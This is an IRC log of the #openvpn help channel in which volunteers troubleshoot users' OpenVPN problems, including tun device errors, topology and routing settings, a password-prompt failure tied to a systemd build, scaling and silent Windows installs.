16:53 <@krzee> I'm on vacation, voluntary ranch work
16:53 < blackmagic> ah.
16:54 <@krzee> just finished rolling 1
16:54 <@krzee> :D
16:54 <@krzee> bbl
16:54 < blackmagic> hopefully a doobie ;P
16:55 -!- scyld [~scyld@unaffiliated/wasyl] has quit [Quit: Wychodzi]
16:56 < hurleyman> thanks for your help. going to dive into the guides to do some tests on a suse vm
16:57 < dvl> Anyone using gmirror on FreeBSD? nearly done instructions for installing directly onto a gmirror when doing a fresh install of FreeBSD 9.1
17:04 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn
17:08 -!- jthunder [~jthunder@70.28.245.77] has quit [Ping timeout: 256 seconds]
17:14 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving]
17:17 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
17:20 -!- midkniht [~midkniht@cpe-70-112-107-27.austin.res.rr.com] has left #openvpn ["Leaving"]
17:32 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit []
17:35 -!- hurleyman [~hurleyman@mail.caffalltile.com] has quit []
17:48 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has quit [Quit: Orbi]
17:52 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 252 seconds]
17:55 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
18:11 -!- MeanderingCode_ [~Meanderin@75-173-12-215.albq.qwest.net] has joined #openvpn
18:11 <@krzee> blackmagic, definitely a doob
18:11 <@krzee> dvl, i use zfs mirror instead
18:12 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 255 seconds]
18:12 < dvl> krzee: that's close, but I'm building a bigger array. ;)
18:39 -!- jthunder [~jthunder@174.3.126.51] has quit [Remote host closed the connection]
18:39 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
18:41 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
18:44 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection]
18:45 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
18:49 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
18:57 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection]
18:57 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
19:01 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Quit: Leaving]
19:02 -!- APTX [~APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds]
19:02 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
19:03 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
19:28 -!- bauruine [~stefan@91.236.116.112] has quit [Read error: Operation timed out]
19:28 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
19:35 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
19:42 -!- raidz is now known as raidz_away
19:44 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
19:52 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer]
19:52 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
19:54 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
20:17 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder]
20:24 -!- APTX [~APTX@unaffiliated/aptx] has quit [Remote host closed the connection]
20:28 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Quit: ZNC - http://znc.sourceforge.net]
20:30 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
20:56 -!- APTX [~APTX@unaffiliated/aptx] has quit [Read error: Connection reset by peer]
21:07 -!- brute11k [~brute11k@89.249.231.124] has joined #openvpn
21:26 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
21:32 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn
21:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
22:04 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn
22:04 < roue> hola
22:04 < roue> I'm trying to get openvpn running on a Chromebook in dev mode.
22:05 < roue> It's complaining with "SIOCSIFADDR: No such device" when trying to ifconfig tun0 after the initial connection is established with the server. Then it dies.
22:05 < roue> verbose logging > 7 causes a seg fault.
22:05 < roue> it's kinda charming.
22:05 < roue> and no gcc toolchain easily available to rebuild.
22:06 < roue> I can openvpn --mktun --dev tun0
22:06 < roue> the kernel module is present.
22:06 <+pekster> gcc was my upcoming suggestion :\
22:06 <+pekster> Is it a debug build? Do you have access to gdb?
22:06 < roue> I can set up a cross compilation env but it's going to take me some time to figure it out.
22:06 < roue> I don't know if it's a debug build.
22:06 <+pekster> openvpn --version should show you
22:07 < roue> I'm also not skilled in the way of gdb. --version reports " OpenVPN 2.1.12 i686-pc-linux-gnu [SSL] [LZ02] [EPOLL] [OJCS11] built on Jan 9 2013
22:07 < roue> nothing about debug.
22:07 <+pekster> Debug build sample here (notice all the build options) http://fpaste.org/gZ9v/raw/
22:07 < roue> But hey, built on Jan 9, so someone is looking at it :)
22:08 <+pekster> Yea, probably not then. Chances are even if you get gdb on the chromebook a backtrace would be worthless without a debug build, and possibly worthless anyway unless frame pointers were kept during the build process
22:08 <+pekster> Sounds like a bad/incomplete build IMO
22:08 < roue> okay, so I'm out of luck until I can compile binaries.
22:08 <+pekster> Does 'openvpn --test-crypto' explode?
22:09 < roue> It wants a --secret. What do I give it?
22:09 <+pekster> Oh, create one first
22:09 <+pekster> 'openvpn --genkey --secret test.key'
22:09 < roue> I tried passing it the private key I'd created for the machine. No dice.
22:09 <+pekster> Then pass it that
22:10 <+pekster> It's not x509; it's a static key
22:10 < roue> Okay, says mode SUCCEEDED.
22:10 <+pekster> Well, not *everything* is broken ;)
22:11 <+pekster> Any hints from the packager? Maybe missing userland packages? I dunno really
22:11 < roue> From the logs it looks like the connection is being established, it's just dying when it tries to configure the network device on the chromebook side.
22:11 <+pekster> Right. I'm wondering if the packager built it targeting some support your system lacks, hence the errors interfacing with the tun device via ifconfig
22:12 <+pekster> roue: You could look at using --ifconfig-noexec and run the userland commands yourself via scripts (call either ifconfig, or, if you can, /sbin/ip since ip is preferred on modern Linuxes)
22:12 < roue> ah, nice idea.
22:13 <+pekster> I dunno if your build was built with iproute2 support, but even if not you can do it all yourself. I forget the exact syntax the env-vars use, but the manpage should provide plenty of details
22:17 -!- king0demons [~king0demo@pool-96-249-233-88.nrflva.fios.verizon.net] has joined #openvpn
22:17 < king0demons> Hello
22:19 < roue> --ifconfig-noexec dumps core. Fun :)
22:20 < king0demons> Is there a way to turn off logging
22:20 < king0demons> For the server I mean
22:21 <+pekster> king0demons: Why not just lower the verbosity if you don't like how talkative the logs are? Technically you can not pass any of the --log* options and it'll dump to stderr/stdout (which will be dropped if you're not redirecting them)
22:23 <+pekster> See --verb, but even at '--verb 0' you still get fatal errors logged. You probably want that, but you can not redirect it or send it to /dev/null if you really want fatal errors to just exit and not tell you (this is a REALLY BAD idea, but you can do it if you'd like)
22:24 <+pekster> Also possibly relevant depending on how you start it: --daemon
22:26 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 255 seconds]
22:31 <+pekster> Don't send CTCP NOTICES like that; it's really bad form, and you're lucky I even saw it as it gets dumped on my status window
22:31 <+pekster> Read about the --daemon reference I gave you. You can "undo" that behaviour by either hacking your distro's initscript or learning to use syslog properly
22:39 -!- king0demons [~king0demo@pool-96-249-233-88.nrflva.fios.verizon.net] has quit [Quit: Nettalk6 - www.ntalk.de]
22:58 -!- MeanderingCode [~Meanderin@75-173-12-215.albq.qwest.net] has joined #openvpn
22:59 -!- MeanderingCode_ [~Meanderin@75-173-12-215.albq.qwest.net] has quit [Ping timeout: 246 seconds]
23:13 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
23:17 -!- jthunder [~jthunder@174.3.126.51] has quit [Client Quit]
23:31 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn
23:36 -!- Dr_Wendy [~FuckOff@208.102.159.64] has joined #openvpn
23:42 < Dr_Wendy> hi, i think my problem is iptables... but i am not skilled enough to tell... if i am being honest... would one or more of you be kind enough to help me troubleshoot?
23:43 < Dr_Wendy> when i do tail /var/log/syslog... i get this over and over again
23:43 < Dr_Wendy> Jan 29 05:37:30 hostname kernel: [4432473.503949] iptables denied: IN=eth0 OUT= MAC=ff:ff:ff:ff:ff:ff:00:00:00:00:00:00:00:00 SRC=12.34.224.107 DST=12.34.224.255 LEN=151 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=UDP SPT=17500 DPT=17500 LEN=131
23:47 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in]
23:49 -!- EugeneKay [EugeneKay@selfloath.in] has quit [Quit: ZNC - http://znc.sourceforge.net]
23:49 -!- EugeneKay [EugeneKay@madeitwor.se] has joined #openvpn
23:50 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
--- Day changed Tue Jan 29 2013
00:05 -!- b1rkh0ff [~b1rkh0ff@31.176.168.75] has quit [Ping timeout: 276 seconds]
00:06 -!- b1rkh0ff [~b1rkh0ff@31.176.156.222] has joined #openvpn
00:23 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.]
00:25 < Dr_Wendy> any help?
00:32 -!- Cpot-Oblivious is now known as Cpt-Oblivious
00:37 -!- Dr_Wendy [~FuckOff@208.102.159.64] has quit [Quit: Senkei.Senbonzakura.Kageyoshi]
00:55 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn
00:59 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.]
01:10 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
01:20 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn
01:22 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
01:26 -!- bisko [~bisko@77.70.26.115] has joined #openvpn
01:31 -!- master_of_master [~master_of@p57B545F7.dip.t-dialin.net] has joined #openvpn
01:32 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
01:38 -!- corretico [~luis@190.211.93.38] has quit [Read error: Connection reset by peer]
01:41 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
01:42 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
01:47 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has quit [Ping timeout: 245 seconds]
01:49 -!- bisko [~bisko@77.70.26.115] has quit [Quit: Textual IRC Client: www.textualapp.com]
01:55 -!- MaxeyPad [~MaxeyPad@74-131-67-45.dhcp.insightbb.com] has joined #openvpn
01:58 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:13 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
02:17 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn
02:20 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn
02:21 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
02:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
02:36 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder]
03:24 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:32 -!- dazo_afk is now known as dazo
03:33 -!- genghi [~Adium@p50899BDD.dip.t-dialin.net] has joined #openvpn
03:36 < genghi> hi… in some docs I see that when using ifconfig-push I can use a netmask like a /24, but other docs imply I must /30. In short, is this statement ever legal: ifconfig-push 10.1.1.5 10.1.1.255 ?
03:36 -!- stephan48 [stephan@opennic/stephan] has joined #openvpn
03:38 < stephan48> hi i am currently using iroute (ccd file) and route (openvpn server config file), is it possible to add routes (route commands) without restarting the openvpn server?
03:38 < kisom> On which side?
03:38 < kisom> Server or client?
03:39 <+pekster> genghi: That depends on your topology, but you probably don't intend to be using p2p topology like that with --ifconfig-push. For 'subnet' or 'net30' topology that's not valid
03:45 -!- Dashers [dash@home.aligrant.com] has joined #openvpn
03:47 < Dashers> How can I retain a route to the VPN server when there is no "external" IP range.
03:47 < genghi> pekster: cool.. gotchya
03:47 < genghi> I missed the net30 part
03:48 <+pekster> genghi: Basically, you don't want to waste IPs by using net30 unless you intend to support OpenVPN versions 2.0.x. 2.1 and higher should use the subnet topology instead
03:48 < Dashers> I'm wanting to use OpenVPN to tunnel through an internal firewall - I allow the VPN connection through to the server, but the connection drops as the routing tables get muddled.
03:49 <+pekster> Now, if you actually need to support both Windows *and* clients running a 2.0.x version, then you have a valid use-case for net30. Otherwise, don't use it ;)
03:49 < genghi> pekster: it seems version +2 uses net30 by default. In my case the clients will be mixed UNIX/Windows, so I must use net30, correct?
03:50 <+pekster> genghi: What is "version +2" ? Are you really running a 2.0.x client? Like 2.0.9?
03:50 <+pekster> I suspect you really want the subnet topology instead, which supports Windows just fine
03:50 < genghi> openvpn-2.2.1-1.el6.x86_64 in this specific case
03:50 < genghi> ok
03:51 <+pekster> See --topology in the manpage for a full breakdown on the choices, but in your case you want subnet, not net30
03:51 < genghi> awesome… thanks
03:51 <+pekster> Dashers: what do you mean no "external IP range" ?
03:52 <+pekster> Dashers: You can route to server-side networks by pushing them from the server to the client. We have a handy guide for that exact situation:
03:52 <+pekster> !serverlan
03:52 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
03:53 < Dashers> Cool, thanks.
03:53 < Dashers> The thing I was getting stuck on was maintaining the route to the server when the server pushes a new gateway for its subnet.
03:53 < Dashers> But then I found this: http://openvpn.net/archive/openvpn-users/2005-12/msg00074.html
03:53 <@vpnHelper> Title: Re: [Openvpn-users] pushing server network as route to client stops openvpn (at openvpn.net)
03:54 <+pekster> Your networks don't overlap, do they?
03:54 -!- zeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn
03:54 < Dashers> Not overlap - but they are the same. i.e. all I'm trying to do is get the client to act as if it was on the opposite side of the firewall (there is no nat routing going on or anything)
03:55 <+pekster> Oh, okay. Just add a more specific route for the VPN server itself; you get variables to identify them under the --route values in the manpage
03:55 < Dashers> Aye, I didn't realise there were variables available - quite handy :D
03:55 < Dashers> Thanks.
03:56 <+pekster> eg: push "route remote_host 255.255.255.255 net_gateway"
03:56 <+pekster> That'll create a /32 (ergo higher priority) route to avoid supernetting your VPN endpoint in the larger route. Remember that this traffic will *not* be encrypted
03:57 <+pekster> Otherwise, you'd need to do some policy routing client-side to identify the VPN traffic and route it using different rules if you wanted all non-VPN traffic to that host to be protected too
03:58 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn
03:58 <+pekster> Oh, fancy that, the same config line is in that mailing list entry you found :P. Heh.
03:59 < Dashers> You clearly know too much :)
03:59 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Client Quit]
03:59 <+pekster> And if I'd read that further I'd have been able to type less. Something about "work smarter, not harder.." no? :)
03:59 < Dashers> Encryption is not required; it's just for getting round a physical restriction on the network.
03:59 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn
04:01 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
04:04 < Dashers> In fact, is it possible to configure it to work without certificates at all? i.e. allow anybody to connect without a client certificate or password?
04:05 <+pekster> Not in multi-client mode, although you could use the same client cert all over with --duplicate-cn, or use un/pw auth and just blindly accept people with an 'exit 0' script to "verify" users
04:05 <+pekster> Every one's a winner!
04:05 <+pekster> A GRE tunnel is probably better suited to that, though
04:05 <+pekster> (Oh, and I suppose not very platform-independent for you, huh?)
04:08 -!- igor_ [~igor@pd907e599.dip0.t-ipconnect.de] has joined #openvpn
04:08 <+pekster> See --auth-user-pass-verify and --client-cert-not-required
04:14 -!- zz_AsadH is now known as AsadH
05:04 -!- Dashers [dash@home.aligrant.com] has quit [Quit: blee]
05:15 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 244 seconds]
05:16 -!- dazo is now known as dazo_afk
05:36 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 276 seconds]
05:40 < igor_> both --up and --up-delay are not working. i have checked permissions. i use absolute path. can't find the mistake. executing the script manually is working
06:00 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
06:04 < stephan48> kisom: sorry was that an answer to my question?
06:09 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds]
06:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
06:16 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn
06:18 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Remote host closed the connection]
06:23 -!- p3rror [~mezgani@2001:0:53aa:64c:104e:5b75:d673:4be2] has joined #openvpn
06:29 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn
07:23 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving]
07:26 -!- mufasa27 [~jchamplin@unaffiliated/mufasa27] has joined #openvpn
07:26 < mufasa27> w
07:27 < mufasa27> whenever i try and start openvpn, I cannot connect with error= " cannot read password from stdin"
07:29 -!- p3rror [~mezgani@2001:0:53aa:64c:104e:5b75:d673:4be2] has quit [Read error: Connection reset by peer]
07:45 -!- Fabius [~Sbratzber@187.110.4.106] has joined #openvpn
07:45 <+pekster> mufasa27: Some part of the startup process requires reading a password (probably to decrypt a private key) and you apparently haven't supplied a stream for stdin to read it from
07:46 <+pekster> If you don't start it from the console, you won't have a valid stdin stream and must make other arrangements to supply decryption passphrases (eg: management interface) or decrypt the keys
07:54 < Fabius> Hello, Folks. I work for a public company, and we already use OPEN VPN. Great Software. Congratulations. But now, A LOT of people intend to access our server via Open VPN. Several different systems. Every kind of application. I need to know about the hardware limitations and network traffic limitations for openvpn usage. Any hint??
07:58 <+pekster> Fabius, the biggest problem to scaling is that openvpn is single-threaded. That effectively limits the number of concurrent users any single instance can support. As long as you load-balance your connections to a suitable number of instances with hardware that can handle the crypto and network load, you'll be set
08:03 < Fabius> pekster, i have today (before scaling) 5 .conf files (5 different vpns). Each one has a different access (set by interface on firewall). This setup creates a different process for each vpn??
08:03 <+pekster> Yes, exactly
08:03 < Fabius> or is it the same one for all of them?
08:03 < fys> Fuck this hangover in the ASSSSSSS.
08:04 <+pekster> Each instance is a separate openvpn process, which means its own config file
08:05 < Fabius> they think about 200 users. They will access a RDP session via VPN. Do you see a disaster? Or maybe it works?
08:05 <+pekster> As long as your hardware supports the load you plan to put on it
08:05 <+pekster> The openvpn mailing lists have some good postings about people benchmarking the CPU and crypto requirements
08:06 <+pekster> Remember that you need at least 1 instance per CPU core you plan to use, otherwise you're just wasting CPUs that'll sit idle
08:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
08:07 < mufasa27> pekster: how would I supply it a stream if I am launching it from the terminal?
08:08 <+pekster> mufasa27: The terminal provides a stdin process, unless you're somehow disconnecting it
08:09 <+pekster> mufasa27: Do you get the error still if you open a terminal and do 'openvpn --config /path/to/your/config.conf' ?
08:09 < Fabius> pekster, thanks a lot
08:10 < Fabius> oh, another question; today i create manually all the keys. Do you suggest some kind of system (web or not) or script for automating all the process?
08:10 < mufasa27> pekster: yeah, I attempt to startup from the terminal by `openvpn --config /etc/openvpn/client.conf` and it still says that it cannot read pass from stadin
08:10 < mufasa27> atdin*
08:11 < mufasa27> stdin* fuck..
08:12 <+pekster> mufasa27: Can you pastebin the config? Normally you'll get an interactive prompt if a key needs to be supplied
08:12 <+pekster> Fabius: Maybe this is of use:
08:12 <+pekster> !xca
08:12 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN (writeup pending): https://community.openvpn.net/openvpn/wiki/XCA
08:13 <+pekster> I've never used it, but it looks convenient if you don't have your own infrastructure in place
08:19 < mufasa27> pekster: http://pastebin.com/4JJdTN9g
08:20 < mufasa27> pekster: the <> tags are fields that I know and are correct
08:22 <+pekster> The 'pull' directive does not take any parameters (near as I can tell that's not posing a problem for you though)
08:22 <+pekster> Also, that's unnecessary since you already specify 'client' which implies 'pull'
08:23 <+pekster> mufasa27: Otherwise that looks fine. The VPN_URL is the hostname, not a standards-like URI, right?
08:25 < mufasa27> pekster: yeah the vpn.url is a url not uri
08:26 < Fabius> pekster and vpnHelper, Thanks a lot
08:26 < mufasa27> I'm using urxvt as a terminal shell, but that shouldn't cause any problems should it?
08:26 <+pekster> mufasa27: If by "url" you mean http://something, then that's wrong. It needs to be a hostname or an IP that your resolver can turn into an IP
08:26 < mufasa27> also running on archlinux 64 bit
08:27 < mufasa27> pekster: it is vpn.something.com
08:27 <+pekster> Also, it might be an issue if it handles stdin poorly. What happens if you use a standard shell, like bash or even sh?
08:28 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn
08:29 < mufasa27> pekster: I'm using a standard bash shell. just using urxvt as a shell frontend.
08:29 < mufasa27> I'll try xterm and get back with ya
08:30 <+pekster> There's nothing weird in that config (besides your funky 'pull' line that you can just remove without impact.) Nothing that would hinder the processing of a password for your protected key file, so somehow your shell/console/whatever isn't passing it to openvpn correctly
08:30 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
08:30 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
08:30 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
08:30 -!- mode/#openvpn [+o krzee] by ChanServ
08:31 < mufasa27> pekster: ok thank you. i'll try another frontend perhaps
08:31 * krzee smells !netman
08:32 <+pekster> No, goofy terminal manager/frontend thing that's somehow eating stdin
08:33 <+pekster> Basic config file that openvpn bails out on when it can't read the decryption passphrase interactively :x
08:34 <@krzee> ahh right
08:34 <@krzee> what frontend?
08:35 -!- mufasa27 [~jchamplin@unaffiliated/mufasa27] has quit [Ping timeout: 248 seconds]
08:36 -!- mufasa27 [~jchamplin@aei-tech.com] has joined #openvpn
08:36 <+pekster> urxvt; I've heard of it, but have no direct experience
08:39 < mufasa27> pekster: i've tried xterm as well. next step would be to try a pure tty shell
08:39 <+pekster> mufasa27: Weird, that should all be unnecessary. If you add 'verb 4' to the config (or on the CLI, ie: 'openvpn --verb 4 --config foo.conf') does it give you any more hint as to the problem?
08:42 -!- KaiForce [~chatzilla@adsl-70-228-88-232.dsl.akrnoh.ameritech.net] has joined #openvpn
08:43 < mufasa27> pekster: http://pastebin.com/7LWTwCJX
08:44 < KaiForce> is there a known issue with the 64bit client 2.3 version crashing on Windows
08:44 < KaiForce> I've had it happen on two machines.
08:47 <+pekster> mufasa27: That's either not started from the command-line, or you've edited the config file from what you showed me earlier, because it's using the 'nobody' user and group. If it still shows the same resulting error that's one thing, but the test doesn't appear the same as what you had issues with before
08:49 <+pekster> The code that causes that error is pretty explicit about the cause too
08:49 <+pekster> if (!get_console_input ... ) msg (M_FATAL, "ERROR: could not read...");
08:49 < mufasa27> pekster: http://pastebin.com/H84QFeCh
08:52 <+pekster> huh. Well now I'm stumped. Apparently it's failing to get console input. Besides a really screwed up shell or file descriptor handling on the OS, I'm not sure what to tell you
08:57 <+pekster> mufasa27: You said you're using arch?
08:58 < mufasa27> pekster: yes I am using arch. I could try it from a tty shell and see how that handles it.
08:59 < mufasa27> pekster: I am getting the same error from a tty shell
09:00 <+pekster> You can give it a shot. The code is pretty simple for that function, but it uses a different system call depending on if you built with systemd support or not. In either event, the only reason it fails is when it can't open a tty to perform the read. That's getpass() without systemd, or get_console_input_systemd() if you built with that support
09:00 -!- bjh4 [~bjh4@64.212.193.1] has joined #openvpn
09:02 < mufasa27> pekster: I built with systemd support so it should call get_console_input_systemd()
09:03 <+pekster> It is doing that if you use --enable-systemd (which is not the default.) It's calling that function, and that function is what's returning a failure status
09:04 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn
09:06 <+pekster> Looks like it's trying to use /bin/systemd-ask-password to handle it through systemd. I'm not familiar at all with systemd's method to manage that, so I can't really troubleshoot beyond this besides suggest you rebuild without systemd support
09:06 <+pekster> src/openvpn/console.c starting on line 158 of the 2.3.0 release
09:06 < mufasa27> ok I'll look into it. thank you
09:07 <+pekster> The easier method might just be to remove that option from your build and re-compile
09:08 < mufasa27> then it will default to the old getpass() ?
09:09 <+pekster> Yea
09:14 -!- Porkepix [~Porkepix@host239-185-dynamic.31-79-r.retail.telecomitalia.it] has joined #openvpn
09:18 < havoc> can 2.3.0 be deployed/installed silently?
09:18 < havoc> google's not finding anything on it
09:19 <+pekster> What platform?
09:20 < havoc> windows
09:20 < havoc> using the .exe
09:20 < havoc> I tried running it w/ --help, -h, -help, /?, nothing :(
09:20 < havoc> or is this a case where I'd have to build my own installer?
09:21 < havoc> openvpn itself isn't so much of an issue, the TAP-win32 is
09:27 <+pekster> It's built with NSIS, so /S is usually the "standard" silent install flag unless otherwise modified by the install script
09:28 <+pekster> You're still going to have potential UI interaction due to the driver signing stuff, depending on OS and the configuration of the "Local Security Policy" settings for driver installs
09:28 < havoc> ah, /s, thanks
09:28 < havoc> eh, I'll just have to try it
09:28 -!- mufasa27 [~jchamplin@aei-tech.com] has quit [Ping timeout: 248 seconds]
09:30 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Going away]
09:30 -!- MeanderingCode [~Meanderin@75-173-12-215.albq.qwest.net] has quit [Remote host closed the connection]
09:31 -!- bjh4 [~bjh4@64.212.193.1] has quit [Ping timeout: 256 seconds]
09:31 <+pekster> Further reading on NSIS and all its features: http://nsis.sourceforge.net/Docs/Chapter3.html#3.2
09:31 <@vpnHelper> Title: Command Line Usage (at nsis.sourceforge.net)
09:32 < havoc> pekster: thanks much :)
09:32 < KaiForce> anyone aware of 64bit 2.3 client crashing on Windows?
09:41 -!- MeanderingCode [~Meanderin@75-173-12-215.albq.qwest.net] has joined #openvpn
09:48 <@ecrist> nope
09:53 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
09:53 -!- MeanderingCode [~Meanderin@75-173-12-215.albq.qwest.net] has quit [Ping timeout: 255 seconds]
09:57 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
09:57 -!- scyld [~scyld@unaffiliated/wasyl] has joined #openvpn
09:57 <@krzee> i have also not heard of it crashing anywhere
09:57 <@krzee> see if the log shows anything
09:57 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn
09:58 <@krzee> maybe its not crashing but rather exiting with extreme prejudice ;]
09:58 < c3vin> I'm having trouble finding instructions on installing centos client
09:58 < c3vin> can someone assist?
09:59 < c3vin> I have existing openvpn server and would like to configure centos 6.3 to connect
09:59 <@krzee> already got openvpn working correctly when you use openvpn config.conf ?
10:00 < rob0> Probably "yum install openvpn" installs the client. yum(8) questions would be on topic in #centos
10:00 <@krzee> in other words, are you looking for help with openvpn or just configuring openvpn to work with your distro's init script?
10:00 <@krzee> we'll help ya with either, but where to go next depends
10:00 <@krzee> or i will at least… i've run centos a little
10:01 <+pekster> Are they finally up to the 3.x kernels? :P
10:01 <@krzee> no idea =]
10:01 < rob0> 2.4 ;)
10:01 < c3vin> I'm looking for ways to configure openvpn client on centos 6.3
10:02 < c3vin> i've found some different docs that don't necessarily match
10:02 <+pekster> Well, back when I was using 5.3 at $job back then, they got really, really good at back-porting things to 2.6.26 or some-such
10:02 <@krzee> running openvpn on basically ANY os is the same
10:02 < c3vin> I can't find any config files included in default client install
10:02 <@krzee> of course windows / android / ios have some caveats
10:02 <@krzee> supply your own config
10:02 < c3vin> dir /etc/openvpn is empty
10:02 <+pekster> !howto
10:03 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
10:03 <@krzee> openvpn doesnt configure itself ;]
10:03 <+pekster> c3vin: ^^ start with that guide the bot just pasted for you
10:03 < c3vin> yea, I'm just looking for proper guidance
10:03 < c3vin> i'll check this out - ty
10:04 < rob0> Probably also look into the CentOS/RHEL documentation for openvpn, as that will tell you where to put your files, what to name them, etc.
10:06 -!- Devastator- [~devas@177.18.197.23] has joined #openvpn
10:06 <@krzee> your client config must match your server config
10:06 <@krzee> like so:
10:06 <@krzee> !sample
10:06 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting
10:06 <@krzee> things like compression settings must match, their certs need to be from the same pki
10:06 <@krzee> you're starting at the right place with that howto =]
10:06 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 276 seconds]
10:07 < c3vin> so one of my areas of confusion involves client keys/certs
10:07 < c3vin> should those be generated from openvpn server and copied to client?
10:07 < c3vin> or generated on client and copied to openvpn folder
10:08 <@krzee> i always recommend generating them all on another machine
